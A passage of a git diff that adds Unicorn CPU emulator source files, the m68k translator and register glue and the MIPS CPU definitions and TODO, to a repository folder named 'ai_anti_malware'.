INSN(link, 4e50, fff8, CF_ISA_A); + INSN(unlk, 4e58, fff8, CF_ISA_A); + INSN(move_to_usp, 4e60, fff8, USP); + INSN(move_from_usp, 4e68, fff8, USP); + INSN(nop, 4e71, ffff, CF_ISA_A); + INSN(stop, 4e72, ffff, CF_ISA_A); + INSN(rte, 4e73, ffff, CF_ISA_A); + INSN(rts, 4e75, ffff, CF_ISA_A); + INSN(movec, 4e7b, ffff, CF_ISA_A); + INSN(jump, 4e80, ffc0, CF_ISA_A); + INSN(jump, 4ec0, ffc0, CF_ISA_A); + INSN(addsubq, 5180, f1c0, CF_ISA_A); + INSN(scc, 50c0, f0f8, CF_ISA_A); + INSN(addsubq, 5080, f1c0, CF_ISA_A); + INSN(tpf, 51f8, fff8, CF_ISA_A); + + /* Branch instructions. */ + INSN(branch, 6000, f000, CF_ISA_A); + /* Disable long branch instructions, then add back the ones we want. */ + INSN(undef, 60ff, f0ff, CF_ISA_A); /* All long branches. */ + INSN(branch, 60ff, f0ff, CF_ISA_B); + INSN(undef, 60ff, ffff, CF_ISA_B); /* bra.l */ + INSN(branch, 60ff, ffff, BRAL); + + INSN(moveq, 7000, f100, CF_ISA_A); + INSN(mvzs, 7100, f100, CF_ISA_B); + INSN(or, 8000, f000, CF_ISA_A); + INSN(divw, 80c0, f0c0, CF_ISA_A); + INSN(addsub, 9000, f000, CF_ISA_A); + INSN(subx, 9180, f1f8, CF_ISA_A); + INSN(suba, 91c0, f1c0, CF_ISA_A); + + INSN(undef_mac, a000, f000, CF_ISA_A); + INSN(mac, a000, f100, CF_EMAC); + INSN(from_mac, a180, f9b0, CF_EMAC); + INSN(move_mac, a110, f9fc, CF_EMAC); + INSN(from_macsr,a980, f9f0, CF_EMAC); + INSN(from_mask, ad80, fff0, CF_EMAC); + INSN(from_mext, ab80, fbf0, CF_EMAC); + INSN(macsr_to_ccr, a9c0, ffff, CF_EMAC); + INSN(to_mac, a100, f9c0, CF_EMAC); + INSN(to_macsr, a900, ffc0, CF_EMAC); + INSN(to_mext, ab00, fbc0, CF_EMAC); + INSN(to_mask, ad00, ffc0, CF_EMAC); + + INSN(mov3q, a140, f1c0, CF_ISA_B); + INSN(cmp, b000, f1c0, CF_ISA_B); /* cmp.b */ + INSN(cmp, b040, f1c0, CF_ISA_B); /* cmp.w */ + INSN(cmpa, b0c0, f1c0, CF_ISA_B); /* cmpa.w */ + INSN(cmp, b080, f1c0, CF_ISA_A); + INSN(cmpa, b1c0, f1c0, CF_ISA_A); + INSN(eor, b180, f1c0, CF_ISA_A); + INSN(and, c000, f000, CF_ISA_A); + INSN(mulw, c0c0, f0c0, CF_ISA_A); + INSN(addsub, d000, f000, CF_ISA_A); + INSN(addx, d180, f1f8, CF_ISA_A); + INSN(adda, d1c0, f1c0, CF_ISA_A); + INSN(shift_im, e080, f0f0, CF_ISA_A); + INSN(shift_reg, e0a0, f0f0, CF_ISA_A); + INSN(undef_fpu, f000, f000, CF_ISA_A); + INSN(fpu, f200, ffc0, CF_FPU); + INSN(fbcc, f280, ffc0, CF_FPU); + INSN(frestore, f340, ffc0, CF_FPU); + INSN(fsave, f340, ffc0, CF_FPU); + INSN(intouch, f340, ffc0, CF_ISA_A); + INSN(cpushl, f428, ff38, CF_ISA_A); + INSN(wddata, fb00, ff00, CF_ISA_A); + INSN(wdebug, fbc0, ffc0, CF_ISA_A); +#undef INSN +} + +/* ??? Some of this implementation is not exception safe. We should always + write back the result to memory before setting the condition codes. */ +static void disas_m68k_insn(CPUM68KState * env, DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t insn; + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, s->pc); + } + + // Unicorn: end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + gen_exception(s, s->pc, EXCP_HLT); + return; + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc)) { + gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, env->uc, s->pc); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + insn = cpu_lduw_code(env, s->pc); + s->pc += 2; + + ((disas_proc)tcg_ctx->opcode_table[insn])(env, s, insn); +} + +/* generate intermediate code for basic block 'tb'. */ +static inline void +gen_intermediate_code_internal(M68kCPU *cpu, TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUM68KState *env = &cpu->env; + DisasContext dc1, *dc = &dc1; + uint16_t *gen_opc_end; + CPUBreakpoint *bp; + int j, lj; + target_ulong pc_start; + int pc_offset; + int num_insns; + int max_insns; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + /* generate intermediate code */ + pc_start = tb->pc; + + dc->tb = tb; + dc->uc = env->uc; + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->env = env; + dc->is_jmp = DISAS_NEXT; + dc->pc = pc_start; + dc->cc_op = CC_OP_DYNAMIC; + dc->singlestep_enabled = cs->singlestep_enabled; + dc->fpcr = env->fpcr; + dc->user = (env->sr & SR_S) == 0; + dc->is_mem = 0; + dc->done_mac = 0; + lj = -1; + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + gen_exception(dc, dc->pc, EXCP_HLT); + goto done_generating; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + do { + pc_offset = dc->pc - pc_start; + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + gen_exception(dc, dc->pc, EXCP_DEBUG); + dc->is_jmp = DISAS_JUMP; + break; + } + } + if (dc->is_jmp) + break; + } + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_instr_start[lj] = 1; + //tcg_ctx.gen_opc_icount[lj] = num_insns; + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + dc->insn_pc = dc->pc; + disas_m68k_insn(env, dc); + num_insns++; + } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end && + !cs->singlestep_enabled && + (pc_offset) < (TARGET_PAGE_SIZE - 32) && + num_insns < max_insns); + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) + block_full = true; + + //if (tb->cflags & CF_LAST_IO) + // gen_io_end(); + if (unlikely(cs->singlestep_enabled)) { + /* Make sure the pc is updated, and raise a debug exception. */ + if (!dc->is_jmp) { + gen_flush_cc_op(dc); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dc->pc); + } + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, EXCP_DEBUG)); + } else { + switch(dc->is_jmp) { + case DISAS_NEXT: + gen_flush_cc_op(dc); + gen_jmp_tb(dc, 0, dc->pc); + break; + default: + case DISAS_JUMP: + case DISAS_UPDATE: + gen_flush_cc_op(dc); + /* indicate that the hash table must be used to find the next TB */ + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case DISAS_TB_JUMP: + /* nothing more to generate */ + break; + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } else { + tb->size = dc->pc - pc_start; + //tb->icount = num_insns; + } + + //optimize_flags(); + //expand_target_qops(); + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUM68KState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(m68k_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUM68KState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(m68k_env_get_cpu(env), tb, true); +} + +void restore_state_to_opc(CPUM68KState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + env->pc = tcg_ctx->gen_opc_pc[pc_pos]; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c new file mode 100644 index 0000000..f63d742 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.c @@ -0,0 +1,122 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/m68k/m68k.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int M68K_REGS_STORAGE_SIZE = offsetof(CPUM68KState, tlb_table); + +static void m68k_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUM68KState *)uc->current_cpu->env_ptr)->pc = address; +} + +void m68k_release(void* ctx); +void m68k_release(void* ctx) +{ + TCGContext *tcg_ctx; + int i; + + release_common(ctx); + tcg_ctx = (TCGContext *) ctx; + g_free(tcg_ctx->tb_ctx.tbs); + g_free(tcg_ctx->QREG_PC); + g_free(tcg_ctx->QREG_SR); + g_free(tcg_ctx->QREG_CC_OP); + g_free(tcg_ctx->QREG_CC_DEST); + g_free(tcg_ctx->QREG_CC_SRC); + g_free(tcg_ctx->QREG_CC_X); + g_free(tcg_ctx->QREG_DIV1); + g_free(tcg_ctx->QREG_DIV2); + g_free(tcg_ctx->QREG_MACSR); + g_free(tcg_ctx->QREG_MAC_MASK); + for (i = 0; i < 8; i++) { + g_free(tcg_ctx->cpu_dregs[i]); + g_free(tcg_ctx->cpu_aregs[i]); + } + g_free(tcg_ctx->NULL_QREG); + g_free(tcg_ctx->store_dummy); +} + +void m68k_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + memset(env->aregs, 0, sizeof(env->aregs)); + memset(env->dregs, 0, sizeof(env->dregs)); + + env->pc = 0; +} + +int m68k_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) + *(int32_t *)value = M68K_CPU(uc, mycpu)->env.aregs[regid - UC_M68K_REG_A0]; + else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) + *(int32_t *)value = M68K_CPU(uc, mycpu)->env.dregs[regid - UC_M68K_REG_D0]; + else { + switch(regid) { + default: break; + case UC_M68K_REG_PC: + *(int32_t *)value = M68K_CPU(uc, mycpu)->env.pc; + break; + } + } + } + + return 0; +} + +int m68k_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) + M68K_CPU(uc, mycpu)->env.aregs[regid - UC_M68K_REG_A0] = *(uint32_t *)value; + else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) + M68K_CPU(uc, mycpu)->env.dregs[regid - UC_M68K_REG_D0] = *(uint32_t *)value; + else { + switch(regid) { + default: break; + case UC_M68K_REG_PC: + M68K_CPU(uc, mycpu)->env.pc = *(uint32_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +void m68k_uc_init(struct uc_struct* uc) +{ + register_accel_types(uc); + m68k_cpu_register_types(uc); + dummy_m68k_machine_init(uc); + uc->release = m68k_release; + uc->reg_read = m68k_reg_read; + uc->reg_write = m68k_reg_write; + uc->reg_reset = m68k_reg_reset; + uc->set_pc = m68k_set_pc; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h new file mode 100644 index 0000000..5947186 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h @@ -0,0 +1,16 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_M68K_H +#define UC_QEMU_TARGET_M68K_H + +// functions to read & write registers +int m68k_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int m68k_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void m68k_reg_reset(struct uc_struct *uc); + +void m68k_uc_init(struct uc_struct* uc); + +extern const int M68K_REGS_STORAGE_SIZE; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs new file mode 100644 index 0000000..e43e509 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs @@ -0,0 +1,3 @@ +obj-y += translate.o dsp_helper.o op_helper.o lmi_helper.o helper.o cpu.o +obj-y += msa_helper.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO new file mode 100644 index 0000000..1d782d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO @@ -0,0 +1,51 @@ +Unsolved issues/bugs in the mips/mipsel backend +----------------------------------------------- + +General +------- +- Unimplemented ASEs: + - MDMX + - SmartMIPS + - microMIPS DSP r1 & r2 encodings +- MT ASE only partially implemented and not functional +- Shadow register support only partially implemented, + lacks set switching on interrupt/exception. +- 34K ITC not implemented. +- A general lack of documentation, especially for technical internals. + Existing documentation is x86-centric. +- Reverse endianness bit not implemented +- The TLB emulation is very inefficient: + QEMU's softmmu implements a x86-style MMU, with separate entries + for read/write/execute, a TLB index which is just a modulo of the + virtual address, and a set of TLBs for each user/kernel/supervisor + MMU mode. + MIPS has a single entry for read/write/execute and only one MMU mode. + But it is fully associative with randomized entry indices, and uses + up to 256 ASID tags as additional matching criterion (which roughly + equates to 256 MMU modes). It also has a global flag which causes + entries to match regardless of ASID. + To cope with these differences, QEMU currently flushes the TLB at + each ASID change. Using the MMU modes to implement ASIDs hinges on + implementing the global bit efficiently. +- save/restore of the CPU state is not implemented (see machine.c). + +MIPS64 +------ +- Userland emulation (both n32 and n64) not functional. + +"Generic" 4Kc system emulation +------------------------------ +- Doesn't correspond to any real hardware. Should be removed some day, + U-Boot is the last remaining user. + +PICA 61 system emulation +------------------------ +- No framebuffer support yet. + +MALTA system emulation +---------------------- +- We fake firmware support instead of doing the real thing +- Real firmware (YAMON) falls over when trying to init RAM, presumably + due to lacking system controller emulation. +- Bonito system controller not implemented +- MSC1 system controller not implemented diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h new file mode 100644 index 0000000..89581d4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h @@ -0,0 +1,84 @@ +/* + * QEMU MIPS CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_MIPS_CPU_QOM_H +#define QEMU_MIPS_CPU_QOM_H + +#include "qom/cpu.h" + +#ifdef TARGET_MIPS64 +#define TYPE_MIPS_CPU "mips64-cpu" +#else +#define TYPE_MIPS_CPU "mips-cpu" +#endif + +#define MIPS_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, MIPSCPUClass, (klass), TYPE_MIPS_CPU) +#define MIPS_CPU(uc, obj) ((MIPSCPU *)obj) +#define MIPS_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, MIPSCPUClass, (obj), TYPE_MIPS_CPU) + +/** + * MIPSCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * A MIPS CPU model. + */ +typedef struct MIPSCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} MIPSCPUClass; + +/** + * MIPSCPU: + * @env: #CPUMIPSState + * + * A MIPS CPU. + */ +typedef struct MIPSCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUMIPSState env; +} MIPSCPU; + +static inline MIPSCPU *mips_env_get_cpu(CPUMIPSState *env) +{ + return container_of(env, MIPSCPU, env); +} + +#define ENV_GET_CPU(e) CPU(mips_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(MIPSCPU, env) + +void mips_cpu_do_interrupt(CPUState *cpu); +bool mips_cpu_exec_interrupt(CPUState *cpu, int int_req); +hwaddr mips_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int mips_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int mips_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); +void mips_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, + int is_write, int is_user, uintptr_t retaddr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c new file mode 100644 index 0000000..3b0d422 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c @@ -0,0 +1,170 @@ +/* + * QEMU MIPS CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ + +#include "cpu.h" +#include "qemu-common.h" +#include "hw/mips/mips.h" + + +static void mips_cpu_set_pc(CPUState *cs, vaddr value) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + env->active_tc.PC = value & ~(target_ulong)1; + if (value & 1) { + env->hflags |= MIPS_HFLAG_M16; + } else { + env->hflags &= ~(MIPS_HFLAG_M16); + } +} + +static void mips_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + env->active_tc.PC = tb->pc; + env->hflags &= ~MIPS_HFLAG_BMASK; + env->hflags |= tb->flags & MIPS_HFLAG_BMASK; +} + +static bool mips_cpu_has_work(CPUState *cs) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + bool has_work = false; + + /* It is implementation dependent if non-enabled interrupts + wake-up the CPU, however most of the implementations only + check for interrupts that can be taken. */ + if ((cs->interrupt_request & CPU_INTERRUPT_HARD) && + cpu_mips_hw_interrupts_pending(env)) { + has_work = true; + } + + /* MIPS-MT has the ability to halt the CPU. */ + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + /* The QEMU model will issue an _WAKE request whenever the CPUs + should be woken up. */ + if (cs->interrupt_request & CPU_INTERRUPT_WAKE) { + has_work = true; + } + + if (!mips_vpe_active(env)) { + has_work = false; + } + } + return has_work; +} + +/* CPUClass::reset() */ +static void mips_cpu_reset(CPUState *s) +{ + MIPSCPU *cpu = MIPS_CPU(s->uc, s); + MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(s->uc, cpu); + CPUMIPSState *env = &cpu->env; + + mcc->parent_reset(s); + + memset(env, 0, offsetof(CPUMIPSState, mvp)); + tlb_flush(s, 1); + + cpu_state_reset(env); +} + +static int mips_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(uc, dev); + + cpu_reset(cs); + qemu_init_vcpu(cs); + + mcc->parent_realize(uc, dev, errp); + + return 0; +} + +static void mips_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + MIPSCPU *cpu = MIPS_CPU(uc, obj); + CPUMIPSState *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + if (tcg_enabled(uc)) { + mips_tcg_init(uc); + } +} + +static void mips_cpu_class_init(struct uc_struct *uc, ObjectClass *c, void *data) +{ + MIPSCPUClass *mcc = MIPS_CPU_CLASS(uc, c); + CPUClass *cc = CPU_CLASS(uc, c); + DeviceClass *dc = DEVICE_CLASS(uc, c); + + mcc->parent_realize = dc->realize; + dc->realize = mips_cpu_realizefn; + + mcc->parent_reset = cc->reset; + cc->reset = mips_cpu_reset; + + cc->has_work = mips_cpu_has_work; + cc->do_interrupt = mips_cpu_do_interrupt; + cc->cpu_exec_interrupt = mips_cpu_exec_interrupt; + cc->set_pc = mips_cpu_set_pc; + cc->synchronize_from_tb = mips_cpu_synchronize_from_tb; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = mips_cpu_handle_mmu_fault; +#else + cc->do_unassigned_access = mips_cpu_unassigned_access; + cc->do_unaligned_access = mips_cpu_do_unaligned_access; + cc->get_phys_page_debug = mips_cpu_get_phys_page_debug; +#endif +} + +void mips_cpu_register_types(void *opaque) +{ + const TypeInfo mips_cpu_type_info = { + TYPE_MIPS_CPU, + TYPE_CPU, + + sizeof(MIPSCPUClass), + sizeof(MIPSCPU), + opaque, + + mips_cpu_initfn, + NULL, + NULL, + + NULL, + + mips_cpu_class_init, + NULL, + NULL, + + false, + }; + + type_register_static(opaque, &mips_cpu_type_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h new file mode 100644 index 0000000..df4ec2b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h @@ -0,0 +1,901 @@ +#if !defined (__MIPS_CPU_H__) +#define __MIPS_CPU_H__ + +//#define DEBUG_OP + +#define ALIGNED_ONLY +#define TARGET_HAS_ICE 1 + +#define ELF_MACHINE EM_MIPS + +#define CPUArchState struct CPUMIPSState + +#include "config.h" +#include "qemu-common.h" +#include "mips-defs.h" +#include "exec/cpu-defs.h" +#include "fpu/softfloat.h" + +struct CPUMIPSState; + +typedef struct r4k_tlb_t r4k_tlb_t; +struct r4k_tlb_t { + target_ulong VPN; + uint32_t PageMask; + uint_fast8_t ASID; + uint_fast16_t G:1; + uint_fast16_t C0:3; + uint_fast16_t C1:3; + uint_fast16_t V0:1; + uint_fast16_t V1:1; + uint_fast16_t D0:1; + uint_fast16_t D1:1; + uint_fast16_t XI0:1; + uint_fast16_t XI1:1; + uint_fast16_t RI0:1; + uint_fast16_t RI1:1; + uint_fast16_t EHINV:1; + target_ulong PFN[2]; +}; + +#if !defined(CONFIG_USER_ONLY) +typedef struct CPUMIPSTLBContext CPUMIPSTLBContext; +struct CPUMIPSTLBContext { + uint32_t nb_tlb; + uint32_t tlb_in_use; + int (*map_address) (struct CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); + void (*helper_tlbwi)(struct CPUMIPSState *env); + void (*helper_tlbwr)(struct CPUMIPSState *env); + void (*helper_tlbp)(struct CPUMIPSState *env); + void (*helper_tlbr)(struct CPUMIPSState *env); + void (*helper_tlbinv)(struct CPUMIPSState *env); + void (*helper_tlbinvf)(struct CPUMIPSState *env); + union { + struct { + r4k_tlb_t tlb[MIPS_TLB_MAX]; + } r4k; + } mmu; +}; +#endif + +/* MSA Context */ +#define MSA_WRLEN (128) + +enum CPUMIPSMSADataFormat { + DF_BYTE = 0, + DF_HALF, + DF_WORD, + DF_DOUBLE +}; + +typedef union wr_t wr_t; +union wr_t { + int8_t b[MSA_WRLEN/8]; + int16_t h[MSA_WRLEN/16]; + int32_t w[MSA_WRLEN/32]; + int64_t d[MSA_WRLEN/64]; +}; + +typedef union fpr_t fpr_t; +union fpr_t { + float64 fd; /* ieee double precision */ + float32 fs[2];/* ieee single precision */ + uint64_t d; /* binary double fixed-point */ + uint32_t w[2]; /* binary single fixed-point */ +/* FPU/MSA register mapping is not tested on big-endian hosts. */ + wr_t wr; /* vector data */ +}; +/* define FP_ENDIAN_IDX to access the same location + * in the fpr_t union regardless of the host endianness + */ +#if defined(HOST_WORDS_BIGENDIAN) +# define FP_ENDIAN_IDX 1 +#else +# define FP_ENDIAN_IDX 0 +#endif + +typedef struct CPUMIPSFPUContext CPUMIPSFPUContext; +struct CPUMIPSFPUContext { + /* Floating point registers */ + fpr_t fpr[32]; + float_status fp_status; + /* fpu implementation/revision register (fir) */ + uint32_t fcr0; +#define FCR0_UFRP 28 +#define FCR0_F64 22 +#define FCR0_L 21 +#define FCR0_W 20 +#define FCR0_3D 19 +#define FCR0_PS 18 +#define FCR0_D 17 +#define FCR0_S 16 +#define FCR0_PRID 8 +#define FCR0_REV 0 + /* fcsr */ + uint32_t fcr31; +#define SET_FP_COND(num,env) do { ((env).fcr31) |= ((num) ? ((int)(1U << (((num) + 24) & 0x1f))) : (1 << 23)); } while(0) +#define CLEAR_FP_COND(num,env) do { ((env).fcr31) &= ~((num) ? ((int)(1U << (((num) + 24) & 0x1f))) : (1 << 23)); } while(0) +#define GET_FP_COND(env) ((((env).fcr31 >> 24) & 0xfe) | (((env).fcr31 >> 23) & 0x1)) +#define GET_FP_CAUSE(reg) (((reg) >> 12) & 0x3f) +#define GET_FP_ENABLE(reg) (((reg) >> 7) & 0x1f) +#define GET_FP_FLAGS(reg) (((reg) >> 2) & 0x1f) +#define SET_FP_CAUSE(reg,v) do { (reg) = ((reg) & ~(0x3f << 12)) | ((v & 0x3f) << 12); } while(0) +#define SET_FP_ENABLE(reg,v) do { (reg) = ((reg) & ~(0x1f << 7)) | ((v & 0x1f) << 7); } while(0) +#define SET_FP_FLAGS(reg,v) do { (reg) = ((reg) & ~(0x1f << 2)) | ((v & 0x1f) << 2); } while(0) +#define UPDATE_FP_FLAGS(reg,v) do { (reg) |= ((v & 0x1f) << 2); } while(0) +#define FP_INEXACT 1 +#define FP_UNDERFLOW 2 +#define FP_OVERFLOW 4 +#define FP_DIV0 8 +#define FP_INVALID 16 +#define FP_UNIMPLEMENTED 32 +}; + +#define NB_MMU_MODES 3 + +typedef struct CPUMIPSMVPContext CPUMIPSMVPContext; +struct CPUMIPSMVPContext { + int32_t CP0_MVPControl; +#define CP0MVPCo_CPA 3 +#define CP0MVPCo_STLB 2 +#define CP0MVPCo_VPC 1 +#define CP0MVPCo_EVP 0 + int32_t CP0_MVPConf0; +#define CP0MVPC0_M 31 +#define CP0MVPC0_TLBS 29 +#define CP0MVPC0_GS 28 +#define CP0MVPC0_PCP 27 +#define CP0MVPC0_PTLBE 16 +#define CP0MVPC0_TCA 15 +#define CP0MVPC0_PVPE 10 +#define CP0MVPC0_PTC 0 + int32_t CP0_MVPConf1; +#define CP0MVPC1_CIM 31 +#define CP0MVPC1_CIF 30 +#define CP0MVPC1_PCX 20 +#define CP0MVPC1_PCP2 10 +#define CP0MVPC1_PCP1 0 +}; + +typedef struct mips_def_t mips_def_t; + +#define MIPS_SHADOW_SET_MAX 16 +#define MIPS_TC_MAX 5 +#define MIPS_FPU_MAX 1 +#define MIPS_DSP_ACC 4 +#define MIPS_KSCRATCH_NUM 6 + +typedef struct TCState TCState; +struct TCState { + target_ulong gpr[32]; + target_ulong PC; + target_ulong HI[MIPS_DSP_ACC]; + target_ulong LO[MIPS_DSP_ACC]; + target_ulong ACX[MIPS_DSP_ACC]; + target_ulong DSPControl; + int32_t CP0_TCStatus; +#define CP0TCSt_TCU3 31 +#define CP0TCSt_TCU2 30 +#define CP0TCSt_TCU1 29 +#define CP0TCSt_TCU0 28 +#define CP0TCSt_TMX 27 +#define CP0TCSt_RNST 23 +#define CP0TCSt_TDS 21 +#define CP0TCSt_DT 20 +#define CP0TCSt_DA 15 +#define 